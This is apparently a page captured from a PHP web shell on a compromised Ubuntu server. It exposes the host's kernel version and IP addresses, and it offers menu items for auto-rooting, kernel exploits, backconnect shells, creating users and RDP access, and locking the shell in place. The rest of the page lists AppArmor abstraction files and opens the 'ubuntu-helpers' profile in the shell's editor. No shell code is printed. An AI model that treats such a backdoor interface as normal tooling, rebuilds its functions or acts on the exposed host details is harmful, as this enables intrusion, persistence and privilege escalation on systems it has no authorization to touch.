Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.155.48
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
snap /
core22 /
1722 /
etc /
apparmor.d /
abstractions /
[ HOME SHELL ]
Name
Size
Permission
Action
apparmor_api
[ DIR ]
drwxr-xr-x
ubuntu-browsers.d
[ DIR ]
drwxr-xr-x
X
1.94
KB
-rw-r--r--
apache2-common
978
B
-rw-r--r--
aspell
412
B
-rw-r--r--
audio
1.94
KB
-rw-r--r--
authentication
1.81
KB
-rw-r--r--
base
6.77
KB
-rw-r--r--
bash
1.58
KB
-rw-r--r--
consoles
903
B
-rw-r--r--
crypto
809
B
-rw-r--r--
cups-client
820
B
-rw-r--r--
dbus
694
B
-rw-r--r--
dbus-accessibility
745
B
-rw-r--r--
dbus-accessibility-strict
760
B
-rw-r--r--
dbus-network-manager-strict
1.37
KB
-rw-r--r--
dbus-session
747
B
-rw-r--r--
dbus-session-strict
1010
B
-rw-r--r--
dbus-strict
781
B
-rw-r--r--
dconf
344
B
-rw-r--r--
dovecot-common
675
B
-rw-r--r--
dri-common
542
B
-rw-r--r--
dri-enumerate
392
B
-rw-r--r--
enchant
2.17
KB
-rw-r--r--
exo-open
1.88
KB
-rw-r--r--
fcitx
558
B
-rw-r--r--
fcitx-strict
821
B
-rw-r--r--
fonts
2.22
KB
-rw-r--r--
freedesktop.org
1.37
KB
-rw-r--r--
gio-open
1.51
KB
-rw-r--r--
gnome
3.73
KB
-rw-r--r--
gnupg
459
B
-rw-r--r--
gtk
1.42
KB
-rw-r--r--
gvfs-open
1.15
KB
-rw-r--r--
hosts_access
511
B
-rw-r--r--
ibus
992
B
-rw-r--r--
kde
2.8
KB
-rw-r--r--
kde-globals-write
413
B
-rw-r--r--
kde-icon-cache-write
256
B
-rw-r--r--
kde-language-write
575
B
-rw-r--r--
kde-open5
3.61
KB
-rw-r--r--
kerberosclient
1.25
KB
-rw-r--r--
ldapclient
856
B
-rw-r--r--
libpam-systemd
770
B
-rw-r--r--
likewise
595
B
-rw-r--r--
mdns
554
B
-rw-r--r--
mesa
1.16
KB
-rw-r--r--
mir
694
B
-rw-r--r--
mozc
573
B
-rw-r--r--
mysql
739
B
-rw-r--r--
nameservice
4.29
KB
-rw-r--r--
nis
625
B
-rw-r--r--
nss-systemd
1.22
KB
-rw-r--r--
nvidia
751
B
-rw-r--r--
opencl
370
B
-rw-r--r--
opencl-common
516
B
-rw-r--r--
opencl-intel
672
B
-rw-r--r--
opencl-mesa
636
B
-rw-r--r--
opencl-nvidia
895
B
-rw-r--r--
opencl-pocl
2.84
KB
-rw-r--r--
openssl
648
B
-rw-r--r--
orbit2
197
B
-rw-r--r--
p11-kit
999
B
-rw-r--r--
perl
974
B
-rw-r--r--
php
1.13
KB
-rw-r--r--
php-worker
558
B
-rw-r--r--
php5
208
B
-rw-r--r--
postfix-common
1.32
KB
-rw-r--r--
private-files
1.62
KB
-rw-r--r--
private-files-strict
1.18
KB
-rw-r--r--
python
1.82
KB
-rw-r--r--
qt5
863
B
-rw-r--r--
qt5-compose-cache-write
399
B
-rw-r--r--
qt5-settings-write
514
B
-rw-r--r--
recent-documents-write
466
B
-rw-r--r--
ruby
1008
B
-rw-r--r--
samba
1.13
KB
-rw-r--r--
smbpass
581
B
-rw-r--r--
snap_browsers
1.63
KB
-rw-r--r--
ssl_certs
1.52
KB
-rw-r--r--
ssl_keys
938
B
-rw-r--r--
svn-repositories
1.72
KB
-rw-r--r--
ubuntu-bittorrent-clients
821
B
-rw-r--r--
ubuntu-browsers
1.58
KB
-rw-r--r--
ubuntu-console-browsers
731
B
-rw-r--r--
ubuntu-console-email
718
B
-rw-r--r--
ubuntu-email
1.06
KB
-rw-r--r--
ubuntu-feed-readers
456
B
-rw-r--r--
ubuntu-gnome-terminal
300
B
-rw-r--r--
ubuntu-helpers
3.7
KB
-rw-r--r--
ubuntu-konsole
453
B
-rw-r--r--
ubuntu-media-players
2.3
KB
-rw-r--r--
ubuntu-unity7-base
2.5
KB
-rw-r--r--
ubuntu-unity7-launcher
311
B
-rw-r--r--
ubuntu-unity7-messaging
313
B
-rw-r--r--
ubuntu-xterm
346
B
-rw-r--r--
user-download
987
B
-rw-r--r--
user-mail
944
B
-rw-r--r--
user-manpages
1000
B
-rw-r--r--
user-tmp
760
B
-rw-r--r--
user-write
972
B
-rw-r--r--
video
231
B
-rw-r--r--
vulkan
1.06
KB
-rw-r--r--
wayland
645
B
-rw-r--r--
web-data
811
B
-rw-r--r--
winbind
882
B
-rw-r--r--
wutmp
711
B
-rw-r--r--
xad
984
B
-rw-r--r--
xdg-desktop
782
B
-rw-r--r--
xdg-open
2.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ubuntu-helpers
# Lenient profile that is intended to be used when 'Ux' is desired but # does not provide enough environment sanitizing. This effectively is an # open profile that blacklists certain known dangerous files and also # does not allow any capabilities. For example, it will not allow 'm' on files # owned be the user invoking the program. While this provides some additional # protection, please use with care as applications running under this profile # are effectively running without any AppArmor protection. Use this profile # only if the process absolutely must be run (effectively) unconfined. # # Usage: # Because this abstraction defines the sanitized_helper profile, it must only # be included once. Therefore this abstraction should typically not be # included in other abstractions so as to avoid parser errors regarding # multiple definitions. # # Limitations: # 1. This does not work for root owned processes, because of the way we use # owner matching in the sanitized helper. We could do a better job with # this to support root, but it would make the policy harder to understand # and going unconfined as root is not desirable any way. # # 2. For this sanitized_helper to work, the program running in the sanitized # environment must open symlinks directly in order for AppArmor to mediate # it. This is confirmed to work with: # - compiled code which can load shared libraries # - python imports # It is known not to work with: # - perl includes # 3. Sanitizing ruby and java # # Use at your own risk. This profile was developed as an interim workaround for # LP: #851986 until AppArmor utilizes proper environment filtering. abi <abi/3.0>, profile sanitized_helper { include <abstractions/base> include <abstractions/X> # Allow all networking network inet, network inet6, # Allow all DBus communications include <abstractions/dbus-session-strict> include <abstractions/dbus-strict> dbus, # Needed for Google Chrome ptrace (trace) peer=**//sanitized_helper, # Allow exec of anything, but under this profile. Allow transition # to other profiles if they exist. /{usr/,usr/local/,}{bin,sbin}/* Pixr, # Allow exec of libexec applications in /usr/lib* and /usr/local/lib* /usr/{,local/}lib*/{,**/}* Pixr, # Allow exec of software-center scripts. We may need to allow wider # permissions for /usr/share, but for now just do this. (LP: #972367) /usr/share/software-center/* Pixr, # Allow exec of texlive font build scripts (LP: #1010909) /usr/share/texlive/texmf{,-dist}/web2c/{,**/}* Pixr, # While the chromium and chrome sandboxes are setuid root, they only link # in limited libraries so glibc's secure execution should be enough to not # require the santized_helper (ie, LD_PRELOAD will only use standard system # paths (man ld.so)). /usr/lib/chromium-browser/chromium-browser-sandbox PUxr, /usr/lib/chromium{,-browser}/chrome-sandbox PUxr, /opt/google/chrome{,-beta,-unstable}/chrome-sandbox PUxr, /opt/google/chrome{,-beta,-unstable}/google-chrome Pixr, /opt/google/chrome{,-beta,-unstable}/chrome Pixr, /opt/google/chrome{,-beta,-unstable}/chrome_crashpad_handler Pixr, /opt/google/chrome{,-beta,-unstable}/{,**/}lib*.so{,.*} m, # The same is needed for Brave /opt/brave.com/brave{,-beta,-dev,-nightly}/chrome-sandbox PUxr, /opt/brave.com/brave{,-beta,-dev,-nightly}/brave-browser{,-beta,-dev,-nightly} Pixr, /opt/brave.com/brave{,-beta,-dev,-nightly}/brave Pixr, /opt/brave.com/brave{,-beta,-dev,-nightly}/{,**/}lib*.so{,.*} m, # Full access / r, /** rwkl, /{,usr/,usr/local/}lib{,32,64}/{,**/}*.so{,.*} m, # Dangerous files audit deny owner /**/* m, # compiled libraries audit deny owner /**/*.py* r, # python imports }
Close